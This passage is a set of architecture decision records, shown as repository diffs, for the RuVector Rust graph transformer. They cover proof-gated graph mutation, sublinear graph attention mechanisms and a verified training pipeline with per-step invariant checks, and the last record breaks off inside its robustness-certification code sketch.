The existing `ruvector-verified` crate provides `ProofEnvironment`, `VerifiedOp<T>`, `ProofAttestation` (82-byte witnesses), and three-tier proof routing (`Reflex`, `Standard`, `Deep`) in `crates/ruvector-verified/src/gated.rs`. However, there is no protocol for composing these primitives into a mutation control substrate -- no defined lifecycle for how a graph mutation acquires its proof, how local proofs compose into regional proofs, how proof scopes align with min-cut partition boundaries, or how the attestation chain grows without unbounded memory.
We need a protocol that makes "no proof, no mutation" the default, while keeping hot-path overhead below 2%.
## Decision
We will implement the Proof-Gated Mutation Protocol as the `proof_gated` module within `ruvector-graph-transformer`. The protocol defines a type-level gate (`ProofGate<T>`), a scoping mechanism (`ProofScope`), a composition algebra for attestation chains, and epoch boundaries for protocol upgrades.
### The ProofGate<T> Type
`ProofGate<T>` is a wrapper that makes the inner value inaccessible without a valid proof:
```rust
/// A value gated behind a machine-checked proof.
///
/// The inner `T` cannot be accessed without presenting a proof that
/// satisfies the gate's `ProofRequirement`. This is enforced at the
/// type level -- there is no `unsafe` escape hatch.
pub struct ProofGate<T> {
/// The gated value. Private -- only accessible via `unlock()`.
inner: T,
/// The proof requirement that must be satisfied.
requirement: ProofRequirement,
/// Attestation produced when the gate was satisfied.
attestation: Option<ProofAttestation>,
}
impl<T> ProofGate<T> {
/// Create a new proof gate with the given requirement.
pub fn new(value: T, requirement: ProofRequirement) -> Self;
/// Attempt to unlock the gate by providing a proof.
/// Returns `&T` on success, `Err(ProofGateRejected)` on failure.
pub fn unlock(&self, env: &mut ProofEnvironment) -> Result<&T>;
/// Consume the gate, returning the value and its attestation chain.
pub fn into_inner(self, env: &mut ProofEnvironment) -> Result<(T, ProofAttestation)>;
/// Check if this gate has been satisfied (attestation present).
pub fn is_satisfied(&self) -> bool;
}
```
`ProofRequirement` is an enum that maps to `ruvector-verified::gated::ProofKind`:
```rust
pub enum ProofRequirement {
/// Dimension equality: vector has expected dimension.
DimensionMatch { expected: u32 },
/// Type constructor: node/edge type matches schema.
TypeMatch { schema_id: u64 },
/// Invariant preservation: graph property holds after mutation.
InvariantPreserved { invariant_id: u32 },
/// Coherence bound: attention coherence above threshold.
CoherenceBound { min_coherence: f64 },
/// Composition: all sub-requirements must be satisfied.
Composite(Vec<ProofRequirement>),
}
```
### Three-Tier Routing
Every mutation routes through the existing `ruvector-verified::gated::route_proof` function, which selects the cheapest sufficient proof tier:
| Tier | Target Latency | Use Case | Implementation |
|------|---------------|----------|----------------|
| **Reflex** | < 10 ns | Dimension checks, reflexivity, literal equality | Direct comparison, no reduction engine. Maps to `ProofTier::Reflex` |
| **Standard** | < 1 us | Type application (depth <= 5), short pipelines (<=3 stages) | Bounded fuel via `ProofTier::Standard { max_fuel }`, auto-escalates on failure |
| **Deep** | < 100 us | Long pipelines, custom proofs, invariant verification | Full 10,000-step kernel via `ProofTier::Deep` |
Routing is automatic: the `ProofRequirement` is classified into a `ProofKind`, passed to `route_proof()`, and the returned `TierDecision` determines which verification path to take. If a tier fails, it escalates to the next tier (Reflex -> Standard -> Deep) via `verify_tiered()` as implemented in `crates/ruvector-verified/src/gated.rs`.
### Attestation Chain
Each successful proof produces a `ProofAttestation` (82 bytes, defined in `crates/ruvector-verified/src/proof_store.rs`). Attestations are stored in a `MutationLedger`:
```rust
pub struct MutationLedger {
/// Append-only log of attestations for this scope.
attestations: Vec<ProofAttestation>,
/// Running content hash (FNV-1a) over all attestation bytes.
chain_hash: u64,
/// Epoch counter for proof algebra versioning.
epoch: u64,
/// Maximum attestations before compaction.
compaction_threshold: usize,
}
impl MutationLedger {
/// Append an attestation. Returns the chain position.
pub fn append(&mut self, att: ProofAttestation) -> u64;
/// Compact old attestations into a single summary attestation.
/// Preserves the chain hash but reduces memory.
pub fn compact(&mut self) -> ProofAttestation;
/// Verify the chain hash is consistent.
pub fn verify_integrity(&self) -> bool;
}
```
### Proof Composition
Local proofs compose into regional proofs via `compose_chain`:
```rust
/// Compose a sequence of local proof attestations into a regional proof.
///
/// The regional proof's `proof_term_hash` is the hash of all constituent
/// attestation hashes. The `reduction_steps` field is the sum of all
/// constituent steps. This is sound because proofs are append-only and
/// each attestation covers a disjoint mutation.
pub fn compose_chain(attestations: &[ProofAttestation]) -> ProofAttestation;
```
Composition respects partition boundaries: a `ProofScope` is defined by a min-cut partition (from `ruvector-mincut`), and proofs within a scope compose locally. Cross-scope composition requires a `GlobalCoherenceProof` that verifies the boundary edges between partitions maintain coherence above the threshold.
### Proof Scope and Min-Cut Alignment
```rust
pub struct ProofScope {
/// Partition ID from ruvector-mincut.
partition_id: u32,
/// Boundary nodes shared with adjacent partitions.
boundary_nodes: Vec<u64>,
/// The ledger for this scope.
ledger: MutationLedger,
/// Coherence measurement for this scope.
coherence: Option<f64>,
}
```
When the graph self-organizes (topology changes via `ruvector-mincut`), proof scopes are re-derived from the new partition. Attestations from the old scope are sealed with a `ScopeTransitionAttestation` that records the old and new partition IDs, the min-cut value at transition, and the composition proof of the old scope.
### Monotonic Semantics
Attestations are append-only. There is no `delete` operation on the `MutationLedger`. Rollback is achieved by appending a **supersession proof** -- a new attestation that proves the rolled-back state is valid, referencing the original attestation by position:
```rust
pub struct SupersessionProof {
/// Position of the attestation being superseded.
superseded_position: u64,
/// The new attestation that replaces it.
replacement: ProofAttestation,
/// Proof that the replacement is sound (e.g., inverse mutation).
soundness_proof_id: u32,
}
```
### Epoch Boundaries
The proof algebra may be upgraded (new invariants, changed reduction limits, new built-in symbols). Epoch boundaries are explicit:
```rust
pub struct EpochBoundary {
/// Previous epoch number.
from_epoch: u64,
/// New epoch number.
to_epoch: u64,
/// Summary attestation sealing all proofs in the previous epoch.
seal: ProofAttestation,
/// New proof environment configuration.
new_config: ProofEnvironmentConfig,
}
```
At an epoch boundary, the `MutationLedger` is compacted, a seal attestation is produced, and the `ProofEnvironment` is reconfigured with new symbols and fuel budgets. Old proofs remain valid (sealed) but new proofs use the updated algebra.
### Performance Budget
The target is less than 2% overhead on the hot path. This is achieved by:
1. **Reflex tier dominance**: In steady-state graph transformer inference, 90%+ of mutations are dimension checks and reflexivity proofs, which route to Reflex (< 10 ns)
2. **FastTermArena**: Bump allocation with O(1) dedup from `crates/ruvector-verified/src/fast_arena.rs` avoids heap allocation
3. **Proof caching**: `ProofEnvironment::cache_lookup` avoids re-proving identical obligations
4. **Lazy attestation**: `ProofAttestation` is constructed only when the caller requests `proof_chain()`, not on every mutation
5. **Batch gating**: Multiple mutations within a single forward pass share one `ProofScope`, amortizing the scope setup cost
Benchmarks must demonstrate: Reflex < 10 ns, Standard < 1 us, Deep < 100 us, composition of 1000 attestations < 50 us, ledger compaction of 10,000 entries < 1 ms.
## Consequences
### Positive
- Every graph mutation carries a machine-checked proof -- auditable, reproducible, and tamper-evident
- Three-tier routing keeps the common case (Reflex) at near-zero cost
- Attestation chains provide a complete audit trail for compliance (GDPR provenance, SOC2 audit logs)
- Epoch boundaries allow upgrading the proof system without invalidating historical proofs
- Monotonic semantics prevent accidental attestation loss
### Negative
- `ProofGate<T>` adds one level of indirection to every graph access
- Developers must reason about `ProofRequirement` when defining new mutation types
- Supersession proofs add complexity compared to simple deletion
- The `MutationLedger` grows linearly with mutations until compaction (mitigated by compaction threshold)
### Risks
- If Reflex tier coverage drops below 90%, the 2% overhead budget may be exceeded. Mitigated by monitoring `ProofStats::cache_hits` ratio in production
- Attestation chain integrity depends on FNV-1a hash -- not cryptographically secure. For production audit trails, upgrade to BLAKE3 (available via `ruvector-graph`'s `blake3` dependency)
- Epoch boundary migration is a manual operation -- if forgotten, the ledger grows unbounded. Mitigated by a configurable auto-epoch threshold in `GraphTransformerConfig`
## Implementation
1. Implement `ProofGate<T>` and `ProofRequirement` in `crates/ruvector-graph-transformer/src/proof_gated/gate.rs`
2. Implement `MutationLedger` with append, compact, and verify in `crates/ruvector-graph-transformer/src/proof_gated/mod.rs`
3. Implement `compose_chain` and `ProofScope` in `crates/ruvector-graph-transformer/src/proof_gated/attestation.rs`
4. Implement `EpochBoundary` in `crates/ruvector-graph-transformer/src/proof_gated/epoch.rs`
5. Add benchmark suite: `benches/proof_gate_bench.rs` covering all three tiers, composition, and compaction
6. Integration test: full forward pass with 10,000 mutations, verifying attestation chain integrity
## References
- ADR-045: Lean-Agentic Integration (establishes `ProofEnvironment`, `ProofAttestation`, `FastTermArena`)
- ADR-046: Graph Transformer Unified Architecture (module structure)
- `crates/ruvector-verified/src/gated.rs`: `ProofTier`, `ProofKind`, `route_proof`, `verify_tiered`
- `crates/ruvector-verified/src/proof_store.rs`: `ProofAttestation`, `ATTESTATION_SIZE` (82 bytes)
- `crates/ruvector-verified/src/fast_arena.rs`: `FastTermArena`, bump allocation with FxHash dedup
- `crates/ruvector-verified/src/error.rs`: `VerificationError` variants
- `crates/ruvector-mincut/Cargo.toml`: `canonical` feature for pseudo-deterministic min-cut
- `crates/ruvector-mincut-gated-transformer/src/energy_gate.rs`: `EnergyGate` decision model

View File

@@ -0,0 +1,304 @@
# ADR-048: Sublinear Graph Attention
## Status
Accepted
## Date
2026-02-25
## Context
Standard graph attention (GAT, Graph Transformer) computes pairwise attention over all nodes, yielding O(n^2) time and memory complexity. For RuVector's target use cases -- billion-node knowledge graphs, large-scale molecular graphs, and real-time recommendation systems -- quadratic scaling is prohibitive.
The RuVector workspace already contains the algorithmic building blocks for sublinear attention:
- `ruvector-solver` provides O(sqrt(n)) Personalized PageRank (PPR) via forward-push (`crates/ruvector-solver/src/forward_push.rs`) and hybrid random walks (`crates/ruvector-solver/src/random_walk.rs`)
- `ruvector-attention` provides `FlashAttention`, `LinearAttention`, and `LocalGlobalAttention` in `crates/ruvector-attention/src/sparse/`
- `ruvector-mincut` provides graph partitioning with the `canonical` feature for pseudo-deterministic min-cut
- `ruvector-gnn` provides memory-mapped tensor storage (`crates/ruvector-gnn/src/mmap.rs`) and cold-tier hyperbatch training for out-of-core processing
- `ruvector-coherence` provides spectral coherence scoring (`spectral` feature) for measuring attention quality
However, there is no unified mechanism for composing these into a graph attention layer with provable sublinear complexity, and no integration with the proof-gated mutation protocol (ADR-047) to certify complexity bounds before execution.
## Decision
We will implement a `sublinear_attention` module in `ruvector-graph-transformer` that provides three complementary sublinear graph attention mechanisms, a proof-gated complexity certification layer, and an integration path with memory-mapped processing for billion-node graphs.
### Mechanism 1: LSH-Attention on Spectral Coordinates
**Complexity**: O(n^{3/2}) time, O(n) memory
Locality-Sensitive Hashing (LSH) groups nodes by their spectral coordinates (Laplacian eigenvectors), then computes attention only within hash buckets. This exploits the fact that spectrally similar nodes tend to be structurally close.
```rust
pub struct LshSpectralAttention {
/// Number of hash tables (more = higher recall, higher cost).
num_tables: usize,
/// Number of hash bits per table.
hash_bits: usize,
/// Spectral dimension (number of Laplacian eigenvectors).
spectral_dim: usize,
/// Proof requirement: complexity bound must be certified.
complexity_proof: ProofRequirement,
}
impl LshSpectralAttention {
/// Compute spectral coordinates via ruvector-coherence::spectral::estimate_fiedler
/// and ruvector-solver's Neumann series for eigenvalue estimation.
pub fn compute_spectral_coords(
&self,
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<SpectralCoords>>;
/// Attention forward pass: hash nodes, compute intra-bucket attention.
pub fn forward(
&mut self,
coords: &SpectralCoords,
features: &NodeFeatures,
env: &mut ProofEnvironment,
) -> Result<ProofGate<AttentionOutput>>;
}
```
The spectral coordinates are computed once per epoch using `ruvector-coherence::spectral::estimate_fiedler` for the Fiedler vector and `ruvector-solver::neumann::NeumannSolver` for fast eigenvalue approximation. LSH tables are rebuilt only when the graph topology changes (detected via min-cut value drift).
### Mechanism 2: PPR-Sampled Attention
**Complexity**: O(n log n) time, O(n log n / eps) memory
Personalized PageRank defines a node-specific importance distribution. For each query node, we sample the top-k PPR neighbors and compute attention only over those:
```rust
pub struct PprSampledAttention {
/// PPR teleport probability (alpha). Standard: 0.15.
alpha: f64,
/// Number of PPR neighbors to attend to per query node.
top_k: usize,
/// Residual threshold for forward-push termination.
epsilon: f64,
/// Solver to use for PPR computation.
solver: PprSolver,
}
pub enum PprSolver {
/// Forward push from ruvector-solver. O(1/eps) per source.
ForwardPush,
/// Hybrid random walk from ruvector-solver. O(sqrt(n) / eps) total.
HybridRandomWalk,
/// Combined: forward push for hot nodes, random walk for cold.
Adaptive { hot_threshold: f64 },
}
impl PprSampledAttention {
/// Compute PPR-sampled attention for a batch of query nodes.
///
/// Delegates to ruvector_solver::forward_push::ForwardPushSolver
/// or ruvector_solver::random_walk (depending on PprSolver variant).
pub fn forward(
&mut self,
query_nodes: &[NodeId],
graph: &impl GraphRepr,
features: &NodeFeatures,
env: &mut ProofEnvironment,
) -> Result<ProofGate<AttentionOutput>>;
}
```
The `Adaptive` solver variant uses a heuristic: nodes with degree > `hot_threshold * avg_degree` use forward push (cheaper for high-degree nodes), while low-degree nodes use hybrid random walks.
### Mechanism 3: Spectral Sparsification
**Complexity**: O(n log n / eps^2) edges retained, O(n log n / eps^2) time
Spectral sparsification reduces the number of edges while preserving the graph Laplacian's spectral properties within a (1 + eps) factor. This is applied as a preprocessing step before any attention mechanism:
```rust
pub struct SpectralSparsifier {
/// Approximation factor. Smaller eps = more edges retained.
epsilon: f64,
/// Effective resistance estimation samples.
resistance_samples: usize,
}
impl SpectralSparsifier {
/// Sparsify the graph, retaining O(n log n / eps^2) edges.
///
/// Uses ruvector_coherence::spectral::estimate_effective_resistance_sampled
/// to compute edge importance, then samples edges proportional to
/// their effective resistance.
pub fn sparsify(
&self,
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<SparsifiedGraph>>;
}
```
### Memory-Mapped Processing for Billion-Node Graphs
For graphs exceeding RAM, the sublinear attention layer integrates with `ruvector-gnn`'s memory-mapped infrastructure:
```rust
pub struct MmapSublinearAttention<A: SublinearGraphAttention> {
/// The underlying attention mechanism.
inner: A,
/// Memory-mapped node features via ruvector_gnn::MmapManager.
mmap_manager: MmapManager,
/// Batch size for out-of-core processing.
batch_size: usize,
}
impl<A: SublinearGraphAttention> MmapSublinearAttention<A> {
/// Process in batches, memory-mapping node features on demand.
/// Uses ruvector-gnn's cold-tier hyperbatch scheduling.
pub fn forward_batched(
&mut self,
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<AttentionOutput>>;
}
```
This uses `ruvector_gnn::mmap::MmapManager` (gated behind `mmap` feature) for zero-copy access to node features stored on disk, and `ruvector_gnn::cold_tier` (gated behind `cold-tier` feature) for scheduling hyperbatches that fit in available RAM.
### Hierarchical Coarsening with Learned Pooling
For multi-scale attention, the module provides hierarchical coarsening that uses `ruvector-mincut` to partition the graph, then computes attention at each coarsening level:
```rust
pub struct HierarchicalAttention {
/// Number of coarsening levels.
levels: usize,
/// Coarsening ratio per level (fraction of nodes to keep).
ratio: f64,
/// Min-cut feature flag: uses canonical min-cut for deterministic partitioning.
use_canonical_mincut: bool,
/// Pooling: how to aggregate node features within a partition.
pooling: PoolingStrategy,
}
pub enum PoolingStrategy {
/// Mean of node features within partition.
Mean,
/// Attention-weighted sum (learnable).
AttentionPooling { dim: usize },
/// Top-k scoring (learnable, like SAGPool).
TopK { ratio: f64 },
}
```
### Proof-Gated Complexity Certification
Before executing any sublinear attention operation, the complexity bound is certified via the proof gate. This prevents accidental quadratic execution:
```rust
/// Certify that the attention mechanism will run within the stated
/// complexity bound for the given graph size.
///
/// Returns a ProofGate<ComplexityBound> that must be unlocked before
/// the attention forward pass can proceed.
pub fn certify_complexity(
mechanism: &dyn SublinearGraphAttention,
graph_stats: &GraphStats,
env: &mut ProofEnvironment,
) -> Result<ProofGate<ComplexityBound>>;
pub struct ComplexityBound {
/// Upper bound on operations: O(f(n, m, params)).
pub ops_upper_bound: u64,
/// Upper bound on memory bytes.
pub memory_upper_bound: u64,
/// The complexity class (for display/logging).
pub complexity_class: String,
}
```
The certification computes the concrete upper bound given the graph's node count `n`, edge count `m`, and mechanism-specific parameters (eps, top_k, num_tables), then proves via `ProofTier::Reflex` that the bound is within the configured budget.
### SublinearGraphAttention Trait
All mechanisms implement a common trait:
```rust
pub trait SublinearGraphAttention {
/// Theoretical complexity class as a string (e.g., "O(n^{3/2})").
fn complexity_class(&self) -> &str;
/// Concrete operation count upper bound for a graph with n nodes, m edges.
fn ops_upper_bound(&self, n: usize, m: usize) -> u64;
/// Concrete memory upper bound in bytes.
fn memory_upper_bound(&self, n: usize, m: usize) -> u64;
/// Forward pass.
fn forward(
&mut self,
graph: &dyn GraphRepr,
features: &NodeFeatures,
env: &mut ProofEnvironment,
) -> Result<ProofGate<AttentionOutput>>;
}
```
### Attention Registry Integration
The `AttentionRegistry` in `GraphTransformer` (ADR-046) can hold any `SublinearGraphAttention` implementor. Users can register custom sublinear mechanisms:
```rust
let mut gt = GraphTransformer::new(config, graph)?;
gt.register_attention("ppr-k64", PprSampledAttention::new(0.15, 64, 1e-6, PprSolver::Adaptive { hot_threshold: 2.0 }));
gt.register_attention("lsh-spectral", LshSpectralAttention::new(8, 12, 32));
```
## Consequences
### Positive
- Billion-node graphs become tractable: O(n log n) PPR attention scales to 10^9 nodes
- Proof-gated complexity bounds prevent runtime blowup -- the system refuses to execute if the bound exceeds budget
- Three complementary mechanisms cover different graph structures (dense clusters via LSH, sparse power-law via PPR, general via sparsification)
- Memory-mapped integration avoids OOM for large graphs
- Hierarchical coarsening enables multi-scale representation learning
### Negative
- LSH spectral coordinates require an upfront eigenvalue computation (amortized over epochs)
- PPR forward-push has high variance for disconnected or near-disconnected components
- Spectral sparsification quality degrades for non-expander graphs
- Three mechanisms increase the decision surface for users choosing an approach
### Risks
- PPR alpha parameter is sensitive: too high (> 0.3) makes attention too local, too low (< 0.05) loses locality. Mitigated by the `Adaptive` solver which auto-tunes based on graph diameter
- Memory-mapped processing introduces I/O latency. On NVMe SSDs, random 4KB reads are ~10 us; on HDDs, ~10 ms. The cold-tier scheduler mitigates this by prefetching based on PPR locality
- Spectral sparsification discards edges that may be important for attention. Mitigated by post-sparsification coherence check via `ruvector-coherence::spectral::SpectralCoherenceScore`
## Implementation
1. Define `SublinearGraphAttention` trait in `crates/ruvector-graph-transformer/src/sublinear_attention/mod.rs`
2. Implement `PprSampledAttention` bridging to `ruvector-solver::forward_push` and `ruvector-solver::random_walk`
3. Implement `LshSpectralAttention` using `ruvector-coherence::spectral` for eigenvector estimation
4. Implement `SpectralSparsifier` using `ruvector-coherence::spectral::estimate_effective_resistance_sampled`
5. Implement `HierarchicalAttention` bridging to `ruvector-mincut` canonical partitioning
6. Implement `MmapSublinearAttention<A>` bridging to `ruvector-gnn::mmap::MmapManager`
7. Implement `certify_complexity` using `ruvector-verified::gated::route_proof`
8. Benchmarks: PPR-64 on ogbn-papers100M (111M nodes), LSH on ogbn-products (2.4M nodes)
## References
- ADR-046: Graph Transformer Unified Architecture (module structure, `AttentionRegistry`)
- ADR-047: Proof-Gated Mutation Protocol (`ProofGate<T>`, `ProofRequirement`)
- `crates/ruvector-solver/src/forward_push.rs`: `ForwardPushSolver` for PPR
- `crates/ruvector-solver/src/random_walk.rs`: hybrid random walk PPR
- `crates/ruvector-solver/src/neumann.rs`: `NeumannSolver` for eigenvalue estimation
- `crates/ruvector-solver/src/traits.rs`: `SolverEngine` trait
- `crates/ruvector-attention/src/sparse/`: `FlashAttention`, `LinearAttention`, `LocalGlobalAttention`
- `crates/ruvector-coherence/src/spectral.rs`: `estimate_fiedler`, `estimate_effective_resistance_sampled`, `SpectralCoherenceScore`
- `crates/ruvector-gnn/src/mmap.rs`: `MmapManager`, `MmapGradientAccumulator`
- `crates/ruvector-gnn/src/cold_tier.rs`: hyperbatch scheduling for out-of-core training
- `crates/ruvector-mincut/Cargo.toml`: `canonical` feature for pseudo-deterministic min-cut
- Klicpera et al., "Predict then Propagate" (ICLR 2019) -- PPR-based GNN
- Spielman & Srivastava, "Graph Sparsification by Effective Resistances" (STOC 2008)

View File

@@ -0,0 +1,529 @@
# ADR-049: Verified Training Pipeline
## Status
Accepted
## Date
2026-02-25
## Context
Training graph transformers involves thousands of gradient steps, each of which modifies model weights. In safety-critical applications, we need guarantees that training did not introduce pathological behavior: unbounded loss spikes, conservation law violations, equivariance breakage, or adversarial vulnerability. Post-hoc auditing of trained models is expensive and often misses subtle training-time regressions.
The RuVector workspace provides the building blocks for verified training:
- `ruvector-gnn` provides `Optimizer` (SGD, Adam), `ElasticWeightConsolidation` (EWC), `LearningRateScheduler`, `ReplayBuffer`, and a training loop with `TrainConfig` in `crates/ruvector-gnn/src/training.rs`
- `ruvector-verified` provides `ProofEnvironment`, `ProofAttestation` (82 bytes), `FastTermArena` for high-throughput proof allocation, and tiered verification via `ProofTier`
- `ruvector-coherence` provides `SpectralCoherenceScore` and `SpectralTracker` (behind `spectral` feature) for monitoring model quality during training
- `ruvector-mincut-gated-transformer` provides `EnergyGate` in `crates/ruvector-mincut-gated-transformer/src/energy_gate.rs` for energy-based decision making
However, there is no mechanism for issuing per-step invariant proofs during training, no `TrainingCertificate` that attests to the training run's integrity, and no integration between the proof system and the gradient update loop.
## Decision
We will implement a `verified_training` module in `ruvector-graph-transformer` that wraps `ruvector-gnn`'s training infrastructure with proof gates, producing per-step invariant proofs and a final `TrainingCertificate` that attests to the entire training run.
### VerifiedTrainer
```rust
/// A training wrapper that issues proof attestations per gradient step.
///
/// Wraps ruvector_gnn::training::Optimizer and composes with
/// ruvector_verified::ProofEnvironment for per-step invariant verification.
pub struct VerifiedTrainer {
/// The underlying GNN optimizer (SGD or Adam).
optimizer: Optimizer,
/// EWC for continual learning (optional).
ewc: Option<ElasticWeightConsolidation>,
/// Learning rate scheduler.
scheduler: LearningRateScheduler,
/// Proof environment for generating attestations.
proof_env: ProofEnvironment,
/// Fast arena for high-throughput proof allocation.
arena: FastTermArena,
/// Per-step invariant specifications.
invariants: Vec<TrainingInvariant>,
/// Accumulated attestations for the training run.
ledger: MutationLedger,
/// Configuration.
config: VerifiedTrainerConfig,
}
```
### Per-Step Invariant Proofs
Each gradient step is bracketed by invariant checks. The `TrainingInvariant` enum defines what is verified:
```rust
pub enum TrainingInvariant {
/// Loss stability: loss stays within a bounded envelope relative to
/// a moving average. Raw loss is NOT monotonic in SGD — this invariant
/// captures what is actually enforceable: bounded deviation from trend.
///
/// **This is a true invariant**, not a heuristic: the proof certifies
/// that loss_t <= moving_avg(loss, window) * (1 + spike_cap).
LossStabilityBound {
/// Maximum spike relative to moving average (e.g., 0.10 = 10% above MA).
spike_cap: f64,
/// Window size for exponential moving average.
window: usize,
/// Gradient norm cap: reject step if ||grad|| > this value.
max_gradient_norm: f64,
/// Step size cap: reject step if effective lr * ||grad|| > this value.
max_step_size: f64,
},
/// Weight norm conservation: ||W_t|| stays within bounds per layer.
/// Prevents gradient explosion/vanishing.
///
/// Rollback strategy: **delta-apply** — gradients are applied to a
/// scratch buffer, norms checked, then committed only if bounds hold.
/// This avoids doubling peak memory via full snapshots.
WeightNormBound {
/// Maximum L2 norm per layer.
max_norm: f64,
/// Minimum L2 norm per layer (prevents collapse).
min_norm: f64,
/// Rollback strategy.
rollback: RollbackStrategy,
},
/// Equivariance: model output is equivariant to graph permutations.
/// **This is a statistical test, not a formal proof.** The certificate
/// records the exact scope: rng seed, sample count, permutation ID hashes.
/// A verifier can replay the exact same permutations to confirm.
PermutationEquivariance {
/// Number of random permutations to test per check.
samples: usize,
/// Maximum allowed deviation (L2 distance / output norm).
max_deviation: f64,
/// RNG seed for reproducibility. Bound into the proof scope.
rng_seed: u64,
},
/// Lipschitz bound: **estimated** Lipschitz constant stays below threshold.
/// Verified per-layer via spectral norm power iteration.
///
/// **Attestation scope:** The certificate records that the estimated bound
/// (via K power iterations with tolerance eps) stayed below max_lipschitz.
/// This does NOT certify the true Lipschitz constant — it certifies
/// that the estimate with stated parameters was within bounds.
LipschitzBound {
/// Maximum Lipschitz constant per layer.
max_lipschitz: f64,
/// Power iteration steps for spectral norm estimation.
power_iterations: usize,
/// Convergence tolerance for power iteration.
tolerance: f64,
},
/// Coherence: spectral coherence score stays above threshold.
/// Uses ruvector-coherence::spectral::SpectralCoherenceScore.
///
/// **Attestation scope:** Like Lipschitz, this is an estimate based on
/// sampled eigenvalues. The certificate records the estimation parameters.
CoherenceBound {
/// Minimum coherence score.
min_coherence: f64,
/// Number of eigenvalue samples for estimation.
eigenvalue_samples: usize,
},
/// Energy gate: compute energy or coherence proxy BEFORE applying
/// gradients. If below threshold, require a stronger proof tier,
/// reduce learning rate, or refuse the step entirely.
///
/// Integrates with ruvector-mincut-gated-transformer::EnergyGate
/// to make training behave like inference gating.
EnergyGate {
/// Minimum energy threshold for standard-tier step.
min_energy: f64,
/// If energy < min_energy, force this tier for verification.
escalation_tier: ProofTier,
/// If energy < critical_energy, refuse the step entirely.
critical_energy: f64,
},
/// Custom invariant with a user-provided verification function.
Custom {
/// Name for logging and attestation.
name: String,
/// Estimated proof complexity (for tier routing).
complexity: u32,
},
}
/// Rollback strategy for failed invariant checks.
pub enum RollbackStrategy {
/// Apply gradients to a scratch buffer, check invariants, then commit.
/// Peak memory: weights + one layer's gradients. No full snapshot.
DeltaApply,
/// Store per-layer deltas, revert only modified layers on failure.
/// Peak memory: weights + delta buffer (typically < 10% of weights).
ChunkedRollback,
/// Full snapshot (doubles peak memory). Use only when other strategies
/// are insufficient (e.g., cross-layer invariants).
FullSnapshot,
}
```
### Invariant Verification Flow
```rust
impl VerifiedTrainer {
/// Execute one verified training step.
///
/// 1. Compute gradients via the underlying optimizer
/// 2. Before applying gradients, verify pre-step invariants
/// 3. Apply gradients
/// 4. Verify post-step invariants
/// 5. Issue attestation for this step
/// 6. If any invariant fails, roll back gradients and return error
pub fn step(
&mut self,
loss: f64,
gradients: &Gradients,
weights: &mut Weights,
) -> Result<StepAttestation> {
// 1. Pre-step: verify gradient bounds and loss stability
let pre_proofs = self.verify_invariants(
InvariantPhase::PreStep,
loss, weights,
)?;
// 2. Energy gate: compute energy/coherence proxy BEFORE mutation.
// If below threshold, escalate proof tier or refuse step.
if let Some(energy_gate) = &self.energy_gate {
let energy = energy_gate.evaluate(weights, gradients);
if energy < energy_gate.critical_energy {
return Err(GraphTransformerError::MutationRejected {
reason: format!("energy {} < critical {}", energy, energy_gate.critical_energy),
});
}
if energy < energy_gate.min_energy {
// Force escalation to stronger proof tier
self.current_tier_override = Some(energy_gate.escalation_tier);
}
}
// 3. Apply gradients via delta-apply strategy (default).
// Gradients go into a scratch buffer, not directly into weights.
let delta = self.optimizer.compute_delta(gradients, weights)?;
// 4. Post-step verification on proposed (weights + delta).
// No mutation has occurred yet.
match self.verify_invariants_on_proposed(
InvariantPhase::PostStep, loss, weights, &delta
) {
Ok(post_proofs) => {
// 5. Commit: apply delta to actual weights.
weights.apply_delta(&delta);
// 6. Compose attestation and append to ledger.
let attestation = self.compose_step_attestation(
pre_proofs, post_proofs,
);
self.ledger.append(attestation.clone());
self.scheduler.step();
self.current_tier_override = None;
Ok(StepAttestation {
step: self.ledger.len() as u64,
attestation,
loss,
invariants_checked: self.invariants.len(),
overridden: false,
})
}
Err(e) if self.config.allow_override => {
// Degraded mode: step proceeds with OverrideProof.
// The override is visible in the certificate.
let override_proof = self.create_override_proof(&e)?;
weights.apply_delta(&delta);
self.ledger.append(override_proof.clone());
self.override_count += 1;
Ok(StepAttestation {
step: self.ledger.len() as u64,
attestation: override_proof,
loss,
invariants_checked: self.invariants.len(),
overridden: true,
})
}
Err(e) => {
// Fail-closed: delta is discarded, weights unchanged.
// Refusal is recorded in the ledger.
let refusal = self.create_refusal_attestation(&e);
self.ledger.append(refusal);
Err(e)
}
}
}
}
```
### Tier Routing for Training Invariants
Training invariant verification uses the same three-tier routing as ADR-047:
| Invariant | Typical Tier | Rationale | Formally Proven? |
|-----------|-------------|-----------|------------------|
| `LossStabilityBound` | Reflex | Moving avg comparison + gradient norm check, < 10 ns | **Yes** — bounded comparison |
| `WeightNormBound` | Standard(100) | L2 norm computation, < 1 us | **Yes** — exact computation |
| `PermutationEquivariance` | Deep | Random permutation + forward pass, < 100 us | **No** — statistical test with bound scope |
| `LipschitzBound` | Standard(500) | Power iteration spectral norm, < 10 us | **No** — estimate with stated tolerance |
| `CoherenceBound` | Standard(200) | Spectral coherence from sampled eigenvalues, < 5 us | **No** — estimate with stated sample count |
| `EnergyGate` | Reflex/Standard | Energy proxy evaluation, < 100 ns | **Yes** — threshold comparison |
| `Custom` | Routed by `complexity` field | User-defined | Depends on implementation |
**Distinction between proven and estimated invariants:** The certificate explicitly records which invariants are formally proven (exact computation within the proof system) and which are statistical estimates with bound scope (rng_seed, sample_count, iterations, tolerance). A verifier knows exactly what was tested and can replay it.
The routing decision is made by converting each `TrainingInvariant` into a `ProofKind` and calling `ruvector_verified::gated::route_proof`. For example, `LossStabilityBound` maps to `ProofKind::DimensionEquality` (literal comparison), while `PermutationEquivariance` maps to `ProofKind::Custom { estimated_complexity: samples * 100 }`.
### Certified Adversarial Robustness
For models that require adversarial robustness certification, the `verified_training` module provides an IBP (Interval Bound Propagation) / DeepPoly integration:
```rust
pub struct RobustnessCertifier {
/// Perturbation radius (L-infinity norm).
epsilon: f64,
/// Certification method.
method: CertificationMethod,
}
pub enum CertificationMethod {
/// Interval Bound Propagation -- fast but loose.
IBP,
/// DeepPoly -- tighter but slower.
DeepPoly,
/// Combined: IBP for initial bound, DeepPoly for refinement.
Hybrid { ibp_warmup_epochs: usize },
}
impl RobustnessCertifier {
/// Certify that the model's output is stable within epsilon-ball.
/// Returns a ProofGate<RobustnessCertificate> with the certified radius.
pub fn certify(
&self,
model: &GraphTransformer<impl GraphRepr>,
input: &GraphBatch,
env: &mut ProofEnvironment,
) -> Result<ProofGate<RobustnessCertificate>>;
}
